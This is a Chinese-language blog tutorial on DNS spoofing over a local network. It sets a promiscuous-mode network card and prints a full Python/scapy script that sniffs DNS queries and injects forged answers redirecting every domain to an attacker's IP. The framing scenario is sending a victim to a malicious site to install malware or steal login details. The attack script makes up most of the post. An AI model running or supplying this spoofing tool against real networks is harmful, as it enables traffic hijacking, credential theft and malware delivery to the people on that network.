通过python实现DNS欺骗

假设在一个的局域网内有两个人:Bob和Eve。Eve想让Bob访问他创建的恶意网页,这样她就可以通过隐藏性的下载给Bob的计算机上安装恶意软件,或者可能展示一个欺骗性的站点来试图窃取Bob的认证信息。

                                   (图片来自以上提供的链接)

(本测试环境,均为centos6.5系统环境)

 一、设置attacker服务器的网卡模式为混杂模式,这样就可以捕获局域网内的所有数据包:

       ifconfig em1 promisc

  查看网卡模式:ifconfig em1

  

     说明网卡已经是混杂模式

 

二、编写攻击代码:

打开dns_spoof.py脚本文件:

 1 #!/usr/bin/env python
 2 # -*- coding -*-:utf-8
 3 
 4 from scapy.all import *
 5 import time
 6 import logging
 7 
 8 logger = logging.getLogger('main')
 9 logging.basicConfig(format='%(levelname)s:%(message)s',level=logging.DEBUG)
10 logger.setLevel(logging.DEBUG)
11 # Set the interface for scapy to use
12 conf.iface = 'br0'
13 # Set the spoofed response
14 spoofed_ip = '192.168.28.118'
15 
16 def send_response(x):
17     # Get the requested domain
18     req_domain = x[DNS].qd.qname
19     logger.info('Found request for' + req_domain)
20     # First,we delete the existing lengths and checksums..
21     # We will let Scapy re-create them
22     del(x[UDP].len)    
23     del(x[UDP].chksum)
24     del(x[IP].len)
25     del(x[IP].chksum)
26     # Let`s build our response from a copy of the original packet
27     response = x.copy()
28     # we need to start by changing our response to be "from-ds" ,or from the access point.
29     response.FCfield = 2L
30     # Switch the MAC addresses
31     #response.addr1,response.addr2 = x.addr2,x.addr1
32     response.src,response.dst = x.dst,x.src
33     # Switch the IP addresses
34     response[IP].src,response[IP].dst = x[IP].dst,x[IP].src
35     # Switch the ports
36     response.sport,response.dport = x.dport,x.sport
37     # Set the DNS flags
38     response[DNS].qr = 1L
39     response[DNS].ra = 1L
40     response[DNS].ancount = 1
41     # Let`s add on the answer section
42     response[DNS].an = DNSRR(
43         rrname = req_domain,
44         type = 'A',
45         rclass = 'IN',
46         ttl = 900,
47         rdata = spoofed_ip
48         )
49     # Now,we inject the response!
50     sendp(response)
51     logger.info('Sent response:' + req_domain + ' -> ' + spoofed_ip + '\n')
52 
53 def main():
54     logger.info('Starting to intercept [CTRL+C to stop]')
55     sniff(prn=lambda x: send_response(x),lfilter=lambda x:x.haslayer(UDP) and x.dport == 53)
56 
57 if __name__ == "__main__":
58     # Make it happen!
59     main()
View Code

该脚本将捕获局域网内的DNS的A记录查询

三、演示:(为了方便演示,将本地dns服务器设置为了223.5.5.5)

使用dig @223.5.5.5 www.baidu.com命令测试如下:

 

本文借鉴了http://jordan-wright.com/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/的方式,脚本直接使用会有问题,做了一下调整,局域网环境实验成功。

译文连接:http://www.oschina.net/translate/wireless-attacks-with-python-part-one-the-airpwn-attack

 

posted on 2016-04-18 16:51  guoqp  阅读(2564)  评论(0编辑  收藏  举报

导航